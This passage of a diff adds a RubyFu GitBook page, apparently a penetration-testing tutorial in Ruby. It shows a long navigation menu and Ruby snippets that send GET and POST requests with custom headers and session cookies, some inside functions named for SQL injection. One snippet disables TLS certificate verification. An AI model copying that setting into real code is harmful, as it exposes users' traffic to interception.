666
|
+
|
667
|
+
<b>4.</b>
|
668
|
+
|
669
|
+
Module 0x4 | Web Kung Fu
|
670
|
+
</a>
|
671
|
+
|
672
|
+
|
673
|
+
<ul class="articles">
|
674
|
+
|
675
|
+
|
676
|
+
<li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
|
677
|
+
|
678
|
+
|
679
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
|
680
|
+
|
681
|
+
<i class="fa fa-check"></i>
|
682
|
+
|
683
|
+
<b>4.1.</b>
|
684
|
+
|
685
|
+
SQL Injection Scanner
|
686
|
+
</a>
|
687
|
+
|
688
|
+
|
689
|
+
</li>
|
690
|
+
|
691
|
+
<li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
|
692
|
+
|
693
|
+
|
694
|
+
<a href="../module_0x4__web_kung_fu/databases.html">
|
695
|
+
|
696
|
+
<i class="fa fa-check"></i>
|
697
|
+
|
698
|
+
<b>4.2.</b>
|
699
|
+
|
700
|
+
Databases
|
701
|
+
</a>
|
702
|
+
|
703
|
+
|
704
|
+
</li>
|
705
|
+
|
706
|
+
<li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
|
707
|
+
|
708
|
+
|
709
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
|
710
|
+
|
711
|
+
<i class="fa fa-check"></i>
|
712
|
+
|
713
|
+
<b>4.3.</b>
|
714
|
+
|
715
|
+
Extending Burp Suite
|
716
|
+
</a>
|
717
|
+
|
718
|
+
|
719
|
+
</li>
|
720
|
+
|
721
|
+
<li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
|
722
|
+
|
723
|
+
|
724
|
+
<a href="../module_0x4__web_kung_fu/browser_manipulation.html">
|
725
|
+
|
726
|
+
<i class="fa fa-check"></i>
|
727
|
+
|
728
|
+
<b>4.4.</b>
|
729
|
+
|
730
|
+
Browser Manipulation
|
731
|
+
</a>
|
732
|
+
|
733
|
+
|
734
|
+
</li>
|
735
|
+
|
736
|
+
<li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
737
|
+
|
738
|
+
|
739
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
740
|
+
|
741
|
+
<i class="fa fa-check"></i>
|
742
|
+
|
743
|
+
<b>4.5.</b>
|
744
|
+
|
745
|
+
Web Services and APIs
|
746
|
+
</a>
|
747
|
+
|
748
|
+
|
749
|
+
<ul class="articles">
|
750
|
+
|
751
|
+
|
752
|
+
<li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
|
753
|
+
|
754
|
+
|
755
|
+
<a href="../module_0x4__web_kung_fu/web_services.html">
|
756
|
+
|
757
|
+
<i class="fa fa-check"></i>
|
758
|
+
|
759
|
+
<b>4.5.1.</b>
|
760
|
+
|
761
|
+
Interacting with Web Services
|
762
|
+
</a>
|
763
|
+
|
764
|
+
|
765
|
+
</li>
|
766
|
+
|
767
|
+
<li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
|
768
|
+
|
769
|
+
|
770
|
+
<a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
|
771
|
+
|
772
|
+
<i class="fa fa-check"></i>
|
773
|
+
|
774
|
+
<b>4.5.2.</b>
|
775
|
+
|
776
|
+
Interacting with APIs
|
777
|
+
</a>
|
778
|
+
|
779
|
+
|
780
|
+
<ul class="articles">
|
781
|
+
|
782
|
+
|
783
|
+
<li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
|
784
|
+
|
785
|
+
|
786
|
+
<a href="../module_0x4__web_kung_fu/wordpress_api.html">
|
787
|
+
|
788
|
+
<i class="fa fa-check"></i>
|
789
|
+
|
790
|
+
<b>4.5.2.1.</b>
|
791
|
+
|
792
|
+
WordPress API
|
793
|
+
</a>
|
794
|
+
|
795
|
+
|
796
|
+
</li>
|
797
|
+
|
798
|
+
<li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
|
799
|
+
|
800
|
+
|
801
|
+
<a href="../module_0x4__web_kung_fu/twitter_api.html">
|
802
|
+
|
803
|
+
<i class="fa fa-check"></i>
|
804
|
+
|
805
|
+
<b>4.5.2.2.</b>
|
806
|
+
|
807
|
+
Twitter API
|
808
|
+
</a>
|
809
|
+
|
810
|
+
|
811
|
+
</li>
|
812
|
+
|
813
|
+
|
814
|
+
</ul>
|
815
|
+
|
816
|
+
</li>
|
817
|
+
|
818
|
+
|
819
|
+
</ul>
|
820
|
+
|
821
|
+
</li>
|
822
|
+
|
823
|
+
<li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
|
824
|
+
|
825
|
+
|
826
|
+
<a href="../module_0x4__web_kung_fu/ruby2javascript.html">
|
827
|
+
|
828
|
+
<i class="fa fa-check"></i>
|
829
|
+
|
830
|
+
<b>4.6.</b>
|
831
|
+
|
832
|
+
Ruby 2 JavaScript
|
833
|
+
</a>
|
834
|
+
|
835
|
+
|
836
|
+
</li>
|
837
|
+
|
838
|
+
<li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
|
839
|
+
|
840
|
+
|
841
|
+
<a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
|
842
|
+
|
843
|
+
<i class="fa fa-check"></i>
|
844
|
+
|
845
|
+
<b>4.7.</b>
|
846
|
+
|
847
|
+
Web Server and Proxy
|
848
|
+
</a>
|
849
|
+
|
850
|
+
|
851
|
+
</li>
|
852
|
+
|
853
|
+
|
854
|
+
</ul>
|
855
|
+
|
856
|
+
</li>
|
857
|
+
|
858
|
+
<li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
|
859
|
+
|
860
|
+
|
861
|
+
<a href="../module_0x5__exploitation_kung_fu/index.html">
|
862
|
+
|
863
|
+
<i class="fa fa-check"></i>
|
864
|
+
|
865
|
+
<b>5.</b>
|
866
|
+
|
867
|
+
Module 0x5 | Exploitation Kung Fu
|
868
|
+
</a>
|
869
|
+
|
870
|
+
|
871
|
+
<ul class="articles">
|
872
|
+
|
873
|
+
|
874
|
+
<li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
|
875
|
+
|
876
|
+
|
877
|
+
<a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
|
878
|
+
|
879
|
+
<i class="fa fa-check"></i>
|
880
|
+
|
881
|
+
<b>5.1.</b>
|
882
|
+
|
883
|
+
Fuzzer
|
884
|
+
</a>
|
885
|
+
|
886
|
+
|
887
|
+
</li>
|
888
|
+
|
889
|
+
<li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
|
890
|
+
|
891
|
+
|
892
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html">
|
893
|
+
|
894
|
+
<i class="fa fa-check"></i>
|
895
|
+
|
896
|
+
<b>5.2.</b>
|
897
|
+
|
898
|
+
Metasploit
|
899
|
+
</a>
|
900
|
+
|
901
|
+
|
902
|
+
<ul class="articles">
|
903
|
+
|
904
|
+
|
905
|
+
<li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
906
|
+
|
907
|
+
|
908
|
+
<a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
909
|
+
|
910
|
+
<i class="fa fa-check"></i>
|
911
|
+
|
912
|
+
<b>5.2.1.</b>
|
913
|
+
|
914
|
+
Auxiliary module
|
915
|
+
</a>
|
916
|
+
|
917
|
+
|
918
|
+
</li>
|
919
|
+
|
920
|
+
<li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
|
921
|
+
|
922
|
+
|
923
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
|
924
|
+
|
925
|
+
<i class="fa fa-check"></i>
|
926
|
+
|
927
|
+
<b>5.2.2.</b>
|
928
|
+
|
929
|
+
Exploit module
|
930
|
+
</a>
|
931
|
+
|
932
|
+
|
933
|
+
</li>
|
934
|
+
|
935
|
+
<li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
|
936
|
+
|
937
|
+
|
938
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
|
939
|
+
|
940
|
+
<i class="fa fa-check"></i>
|
941
|
+
|
942
|
+
<b>5.2.3.</b>
|
943
|
+
|
944
|
+
Meterpreter
|
945
|
+
</a>
|
946
|
+
|
947
|
+
|
948
|
+
<ul class="articles">
|
949
|
+
|
950
|
+
|
951
|
+
<li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
|
952
|
+
|
953
|
+
|
954
|
+
<a href="../module_0x5__exploitation_kung_fu/extensions.html">
|
955
|
+
|
956
|
+
<i class="fa fa-check"></i>
|
957
|
+
|
958
|
+
<b>5.2.3.1.</b>
|
959
|
+
|
960
|
+
API and Extensions
|
961
|
+
</a>
|
962
|
+
|
963
|
+
|
964
|
+
</li>
|
965
|
+
|
966
|
+
<li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
967
|
+
|
968
|
+
|
969
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
970
|
+
|
971
|
+
<i class="fa fa-check"></i>
|
972
|
+
|
973
|
+
<b>5.2.3.2.</b>
|
974
|
+
|
975
|
+
Meterpreter Scripting
|
976
|
+
</a>
|
977
|
+
|
978
|
+
|
979
|
+
</li>
|
980
|
+
|
981
|
+
<li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
982
|
+
|
983
|
+
|
984
|
+
<a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
985
|
+
|
986
|
+
<i class="fa fa-check"></i>
|
987
|
+
|
988
|
+
<b>5.2.3.3.</b>
|
989
|
+
|
990
|
+
Railgun API Extension
|
991
|
+
</a>
|
992
|
+
|
993
|
+
|
994
|
+
</li>
|
995
|
+
|
996
|
+
|
997
|
+
</ul>
|
998
|
+
|
999
|
+
</li>
|
1000
|
+
|
1001
|
+
|
1002
|
+
</ul>
|
1003
|
+
|
1004
|
+
</li>
|
1005
|
+
|
1006
|
+
<li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
|
1007
|
+
|
1008
|
+
|
1009
|
+
<a href="../module_0x5__exploitation_kung_fu/metasm.html">
|
1010
|
+
|
1011
|
+
<i class="fa fa-check"></i>
|
1012
|
+
|
1013
|
+
<b>5.3.</b>
|
1014
|
+
|
1015
|
+
metasm
|
1016
|
+
</a>
|
1017
|
+
|
1018
|
+
|
1019
|
+
</li>
|
1020
|
+
|
1021
|
+
|
1022
|
+
</ul>
|
1023
|
+
|
1024
|
+
</li>
|
1025
|
+
|
1026
|
+
<li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
|
1027
|
+
|
1028
|
+
|
1029
|
+
<a href="../module_0x6__forensic/index.html">
|
1030
|
+
|
1031
|
+
<i class="fa fa-check"></i>
|
1032
|
+
|
1033
|
+
<b>6.</b>
|
1034
|
+
|
1035
|
+
Module 0x6 | Forensic Kung Fu
|
1036
|
+
</a>
|
1037
|
+
|
1038
|
+
|
1039
|
+
<ul class="articles">
|
1040
|
+
|
1041
|
+
|
1042
|
+
<li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
|
1043
|
+
|
1044
|
+
|
1045
|
+
<a href="../module_0x6__forensic/windows_forensic.html">
|
1046
|
+
|
1047
|
+
<i class="fa fa-check"></i>
|
1048
|
+
|
1049
|
+
<b>6.1.</b>
|
1050
|
+
|
1051
|
+
Windows Forensic
|
1052
|
+
</a>
|
1053
|
+
|
1054
|
+
|
1055
|
+
</li>
|
1056
|
+
|
1057
|
+
<li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
|
1058
|
+
|
1059
|
+
|
1060
|
+
<a href="../module_0x6__forensic/android_forensic.html">
|
1061
|
+
|
1062
|
+
<i class="fa fa-check"></i>
|
1063
|
+
|
1064
|
+
<b>6.2.</b>
|
1065
|
+
|
1066
|
+
Android Forensic
|
1067
|
+
</a>
|
1068
|
+
|
1069
|
+
|
1070
|
+
</li>
|
1071
|
+
|
1072
|
+
<li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1073
|
+
|
1074
|
+
|
1075
|
+
<a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1076
|
+
|
1077
|
+
<i class="fa fa-check"></i>
|
1078
|
+
|
1079
|
+
<b>6.3.</b>
|
1080
|
+
|
1081
|
+
Network Traffic Analysis
|
1082
|
+
</a>
|
1083
|
+
|
1084
|
+
|
1085
|
+
</li>
|
1086
|
+
|
1087
|
+
<li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
|
1088
|
+
|
1089
|
+
|
1090
|
+
<a href="../module_0x6__forensic/parsing_log_files.html">
|
1091
|
+
|
1092
|
+
<i class="fa fa-check"></i>
|
1093
|
+
|
1094
|
+
<b>6.4.</b>
|
1095
|
+
|
1096
|
+
Parsing Log Files
|
1097
|
+
</a>
|
1098
|
+
|
1099
|
+
|
1100
|
+
</li>
|
1101
|
+
|
1102
|
+
|
1103
|
+
</ul>
|
1104
|
+
|
1105
|
+
</li>
|
1106
|
+
|
1107
|
+
<li class="chapter " data-level="7" data-path="references/index.html">
|
1108
|
+
|
1109
|
+
|
1110
|
+
<a href="../references/index.html">
|
1111
|
+
|
1112
|
+
<i class="fa fa-check"></i>
|
1113
|
+
|
1114
|
+
<b>7.</b>
|
1115
|
+
|
1116
|
+
References
|
1117
|
+
</a>
|
1118
|
+
|
1119
|
+
|
1120
|
+
</li>
|
1121
|
+
|
1122
|
+
<li class="chapter " data-level="8" data-path="faqs/index.html">
|
1123
|
+
|
1124
|
+
|
1125
|
+
<a href="../faqs/index.html">
|
1126
|
+
|
1127
|
+
<i class="fa fa-check"></i>
|
1128
|
+
|
1129
|
+
<b>8.</b>
|
1130
|
+
|
1131
|
+
FAQs
|
1132
|
+
</a>
|
1133
|
+
|
1134
|
+
|
1135
|
+
</li>
|
1136
|
+
|
1137
|
+
<li class="chapter " data-level="9" data-path="contributors/index.html">
|
1138
|
+
|
1139
|
+
|
1140
|
+
<a href="../contributors/index.html">
|
1141
|
+
|
1142
|
+
<i class="fa fa-check"></i>
|
1143
|
+
|
1144
|
+
<b>9.</b>
|
1145
|
+
|
1146
|
+
Contributors
|
1147
|
+
</a>
|
1148
|
+
|
1149
|
+
|
1150
|
+
<ul class="articles">
|
1151
|
+
|
1152
|
+
|
1153
|
+
<li class="chapter " data-level="9.1" data-path="contributors/todo.html">
|
1154
|
+
|
1155
|
+
|
1156
|
+
<a href="../contributors/todo.html">
|
1157
|
+
|
1158
|
+
<i class="fa fa-check"></i>
|
1159
|
+
|
1160
|
+
<b>9.1.</b>
|
1161
|
+
|
1162
|
+
TODO
|
1163
|
+
</a>
|
1164
|
+
|
1165
|
+
|
1166
|
+
</li>
|
1167
|
+
|
1168
|
+
|
1169
|
+
</ul>
|
1170
|
+
|
1171
|
+
</li>
|
1172
|
+
|
1173
|
+
|
1174
|
+
|
1175
|
+
|
1176
|
+
<li class="divider"></li>
|
1177
|
+
<li>
|
1178
|
+
<a href="https://www.gitbook.com" target="blank" class="gitbook-link">
|
1179
|
+
Published with GitBook
|
1180
|
+
</a>
|
1181
|
+
</li>
|
1182
|
+
|
1183
|
+
</ul>
|
1184
|
+
</nav>
|
1185
|
+
</div>
|
1186
|
+
|
1187
|
+
<div class="book-body">
|
1188
|
+
<div class="body-inner">
|
1189
|
+
<div class="book-header" role="navigation">
|
1190
|
+
<!-- Actions Left -->
|
1191
|
+
|
1192
|
+
|
1193
|
+
<!-- Title -->
|
1194
|
+
<h1>
|
1195
|
+
<i class="fa fa-circle-o-notch fa-spin"></i>
|
1196
|
+
<a href="../" >RubyFu</a>
|
1197
|
+
</h1>
|
1198
|
+
</div>
|
1199
|
+
|
1200
|
+
<div class="page-wrapper" tabindex="-1" role="main">
|
1201
|
+
<div class="page-inner">
|
1202
|
+
|
1203
|
+
|
1204
|
+
<section class="normal" id="section-">
|
1205
|
+
|
1206
|
+
<h1 id="chapter-0x4--web-kung-fu"><a name="chapter-0x4--web-kung-fu" class="plugin-anchor" href="#chapter-0x4--web-kung-fu"><span class="fa fa-link"></span></a>Chapter 0x4 | Web Kung Fu</h1>
|
1207
|
+
<h2 id="send-get-request"><a name="send-get-request" class="plugin-anchor" href="#send-get-request"><span class="fa fa-link"></span></a>Send Get request</h2>
|
1208
|
+
<h3 id="using-nethttp"><a name="using-nethttp" class="plugin-anchor" href="#using-nethttp"><span class="fa fa-link"></span></a>Using Net::HTTP</h3>
|
1209
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1210
|
+
<span class="hljs-comment"># KING SABRI</span>
|
1211
|
+
<span class="hljs-comment"># Usage | ruby send_get.rb [HOST] [SESSION_ID]</span>
|
1212
|
+
<span class="hljs-comment">#</span>
|
1213
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">"net/http"</span>
|
1214
|
+
|
1215
|
+
host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>] || <span class="hljs-string">"172.16.50.139"</span>
|
1216
|
+
session_id = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">1</span>] || <span class="hljs-string">"3c0e9a7edfa6682cb891f1c3df8a33ad"</span>
|
1217
|
+
|
1218
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_sqli</span><span class="hljs-params">(query)</span></span>
|
1219
|
+
|
1220
|
+
uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">"https://<span class="hljs-subst">#{host}</span>/script/path/file.php?"</span>)
|
1221
|
+
uri.query = <span class="hljs-constant">URI</span>.encode_www_form({<span class="hljs-string">"var1"</span>=> <span class="hljs-string">"val1"</span>,
|
1222
|
+
<span class="hljs-string">"var2"</span>=> <span class="hljs-string">"val2"</span>,
|
1223
|
+
<span class="hljs-string">"var3"</span>=> <span class="hljs-string">"val3"</span>})
|
1224
|
+
|
1225
|
+
http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
|
1226
|
+
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">'https'</span> <span class="hljs-comment"># Enable HTTPS support if it's HTTPS</span>
|
1227
|
+
|
1228
|
+
request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri.request_uri)
|
1229
|
+
request[<span class="hljs-string">"User-Agent"</span>] = <span class="hljs-string">"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"</span>
|
1230
|
+
request[<span class="hljs-string">"Connection"</span>] = <span class="hljs-string">"keep-alive"</span>
|
1231
|
+
request[<span class="hljs-string">"Accept-Language"</span>] = <span class="hljs-string">"en-US,en;q=0.5"</span>
|
1232
|
+
request[<span class="hljs-string">"Accept-Encoding"</span>] = <span class="hljs-string">"gzip, deflate"</span>
|
1233
|
+
request[<span class="hljs-string">"Accept"</span>] = <span class="hljs-string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>
|
1234
|
+
request[<span class="hljs-string">"PHPSESSID"</span>] = session_id
|
1235
|
+
|
1236
|
+
<span class="hljs-keyword">begin</span>
|
1237
|
+
puts <span class="hljs-string">"Sending.. "</span>
|
1238
|
+
response = http.request(request).body
|
1239
|
+
<span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> => e
|
1240
|
+
puts <span class="hljs-string">"[!] Failed!"</span>
|
1241
|
+
puts e
|
1242
|
+
<span class="hljs-keyword">end</span>
|
1243
|
+
|
1244
|
+
<span class="hljs-keyword">end</span>
|
1245
|
+
</code></pre>
|
1246
|
+
<h3 id="using-openuri"><a name="using-openuri" class="plugin-anchor" href="#using-openuri"><span class="fa fa-link"></span></a>Using Open-uri</h3>
|
1247
|
+
<p>Here another way to do the same thing </p>
|
1248
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1249
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'open-uri'</span>
|
1250
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'openssl'</span>
|
1251
|
+
|
1252
|
+
host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>] || <span class="hljs-string">"172.16.50.139"</span>
|
1253
|
+
session_id = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">1</span>] || <span class="hljs-string">"3c0e9a7edfa6682cb891f1c3df8a33ad"</span>
|
1254
|
+
|
1255
|
+
|
1256
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_sqli</span></span>
|
1257
|
+
uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">"https://<span class="hljs-subst">#{host}</span>/script/path/file.php?var1=val1&var2=val2&var3=val3"</span>)
|
1258
|
+
headers =
|
1259
|
+
{
|
1260
|
+
<span class="hljs-string">"User-Agent"</span> => <span class="hljs-string">"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"</span>,
|
1261
|
+
<span class="hljs-string">"Connection"</span> => <span class="hljs-string">"keep-alive"</span>,
|
1262
|
+
<span class="hljs-string">"Accept-Language"</span> => <span class="hljs-string">"en-US,en;q=0.5"</span>,
|
1263
|
+
<span class="hljs-string">"Accept-Encoding"</span> => <span class="hljs-string">"gzip, deflate"</span>,
|
1264
|
+
<span class="hljs-string">"Accept"</span> => <span class="hljs-string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>,
|
1265
|
+
<span class="hljs-string">"Cookie"</span> => <span class="hljs-string">"PHPSESSID=<span class="hljs-subst">#{session_id}</span>"</span>
|
1266
|
+
}
|
1267
|
+
request = open(uri, <span class="hljs-symbol">:ssl_verify_mode</span> => <span class="hljs-constant">OpenSSL::SSL::VERIFY_NONE</span>, headers)
|
1268
|
+
puts <span class="hljs-string">"Sending.. "</span>
|
1269
|
+
response = request.read
|
1270
|
+
puts response
|
1271
|
+
<span class="hljs-keyword">end</span>
|
1272
|
+
</code></pre>
|
1273
|
+
<h2 id="send-http-post-request-with-custom-headers"><a name="send-http-post-request-with-custom-headers" class="plugin-anchor" href="#send-http-post-request-with-custom-headers"><span class="fa fa-link"></span></a>Send HTTP Post request with custom headers</h2>
|
1274
|
+
<p>Here the post body from a file</p>
|
1275
|
+
<pre><code class="lang-ruby"><span class="hljs-keyword">require</span> <span class="hljs-string">'net/http'</span>
|
1276
|
+
|
1277
|
+
uri = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">"http://example.com/Pages/PostPage.aspx"</span>
|
1278
|
+
headers =
|
1279
|
+
{
|
1280
|
+
<span class="hljs-string">'Referer'</span> => <span class="hljs-string">'http://example.com/Pages/SomePage.aspx'</span>,
|
1281
|
+
<span class="hljs-string">'Cookie'</span> => <span class="hljs-string">'TS9e4B=ae79efe; WSS_FullScrende=false; ASP.NET_SessionId=rxuvh3l5dam'</span>,
|
1282
|
+
<span class="hljs-string">'Connection'</span> => <span class="hljs-string">'keep-alive'</span>,
|
1283
|
+
<span class="hljs-string">'Content-Type'</span> =><span class="hljs-string">'application/x-www-form-urlencoded'</span>
|
1284
|
+
}
|
1285
|
+
post = <span class="hljs-constant">File</span>.read post_file <span class="hljs-comment"># Raw Post Body's Data</span>
|
1286
|
+
http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
|
1287
|
+
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">'https'</span> <span class="hljs-comment"># Enable HTTPS support if it's HTTPS</span>
|
1288
|
+
request = <span class="hljs-constant">Net::HTTP::Post</span>.new(uri.path, headers)
|
1289
|
+
request.body = post
|
1290
|
+
response = http.request request
|
1291
|
+
puts response.code
|
1292
|
+
puts response.body
|
1293
|
+
</code></pre>
|
1294
|
+
<h2 id="more-control-on-post-variables"><a name="more-control-on-post-variables" class="plugin-anchor" href="#more-control-on-post-variables"><span class="fa fa-link"></span></a>More control on Post variables</h2>
|
1295
|
+
<p>Let's to take the following form as a simple post form to mimic in our script</p>
|
1296
|
+
<table>
|
1297
|
+
<thead>
|
1298
|
+
<tr>
|
1299
|
+
<th style="text-align:center"><img src="../images/module04/webfu__post_form1.png" alt="PostForm"></th>
|
1300
|
+
</tr>
|
1301
|
+
</thead>
|
1302
|
+
<tbody>
|
1303
|
+
<tr>
|
1304
|
+
<td style="text-align:center"><strong>Figure 1.</strong> Simple Post form</td>
|
1305
|
+
</tr>
|
1306
|
+
</tbody>
|
1307
|
+
</table>
|
1308
|
+
<p>Post form code:</p>
|
1309
|
+
<pre><code class="lang-html"><span class="hljs-tag"><<span class="hljs-title">FORM</span> <span class="hljs-attribute">METHOD</span>=<span class="hljs-value">POST</span> <span class="hljs-attribute">ACTION</span>=<span class="hljs-value">"http://wwwx.cs.unc.edu/~jbs/aw-wwwp/docs/resources/perl/perl-cgi/programs/cgi_stdin.cgi"</span>></span>
|
1310
|
+
|
1311
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Name field: <span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"text"</span> <span class="hljs-attribute">Name</span>=<span class="hljs-value">"name"</span> <span class="hljs-attribute">SIZE</span>=<span class="hljs-value">30</span> <span class="hljs-attribute">VALUE</span> = "<span class="hljs-attribute">You</span> <span class="hljs-attribute">name</span>"></span>
|
1312
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Name field: <span class="hljs-tag"><<span class="hljs-title">TEXTAREA</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"textarea"</span> <span class="hljs-attribute">ROWS</span>=<span class="hljs-value">5</span> <span class="hljs-attribute">COLS</span>=<span class="hljs-value">30</span> <span class="hljs-attribute">Name</span>=<span class="hljs-value">"textarea"</span>></span>Your comment.<span class="hljs-tag"></<span class="hljs-title">TEXTAREA</span>></span>
|
1313
|
+
|
1314
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Your age: <span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"radio"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"radiobutton"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"youngun"</span>></span> younger than 21,
|
1315
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"radio"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"radiobutton"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"middleun"</span> <span class="hljs-attribute">CHECKED</span>></span> 21 -59,
|
1316
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"radio"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"radiobutton"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"oldun"</span>></span> 60 or older
|
1317
|
+
|
1318
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Things you like:
|
1319
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"pizza"</span> <span class="hljs-attribute">CHECKED</span>></span>pizza,
|
1320
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"hamburgers"</span> <span class="hljs-attribute">CHECKED</span>></span>hamburgers,
|
1321
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"spinich"</span>></span>spinich,
|
1322
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"mashed potatoes"</span> <span class="hljs-attribute">CHECKED</span>></span>mashed potatoes
|
1323
|
+
|
1324
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>What you like most:
|
1325
|
+
<span class="hljs-tag"><<span class="hljs-title">SELECT</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"selectitem"</span>></span>
|
1326
|
+
